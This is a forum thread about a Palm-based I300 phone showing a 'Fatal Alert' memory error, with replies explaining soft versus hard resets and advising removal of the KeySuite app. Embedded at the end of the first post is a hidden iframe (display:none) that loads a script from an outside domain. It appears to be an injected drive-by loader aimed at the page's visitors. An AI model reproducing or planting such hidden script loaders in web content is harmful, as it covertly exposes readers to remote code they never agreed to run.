    Please help-Fatal Alert

When I go to dial a number I get the following:

    Fatal Alert

    MemoryMgr.c, Line:4347,
    Non-word-aligned handle.

    Reset.

The screen is frozen and so I take a pin and press it in the reset whole in the back (is that a hard reset or soft reset) The phone The I300 shows the Palm Logo and then seems to fire up fine but if I try the use the phone get the same message. Anybody else with this problem. Any suggestions on a fix.

    Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Push and hold the power, while pressing the reset button. It'll ask you to push up to erase all information. (Push up). See if your phone works. Then re-Sync it to your PC.

    Thanks for the reply.

Is reset and power considered a hard reset?

The fatal alert message is gone and phone works until I hotsynch.
    Then I get the alert.

The synch logs seem ok. I guess something is corrupting the phone. Key Suite is the last thing I installed. Anyone else have similar problems?

Try to unistall KeySuite from your pc, Then delete it from your Palm Backup Folder. Hard Reset and Re-Sync your phone and see if that was the problem.

key suite will confuse the phone ops in the unit DELETE IT AT ONCE and the unit should return to normal.

FYI: pressing the button on the back is a soft reset,
using the power button and getting the screen to say "erase all data?" is a hard reset only if you choose to erase all data.

this is another prime example to the thread i posted about not all palm aps are compatible with the i300.
my i500 is more obsolete than your ti-99 or apple IIe
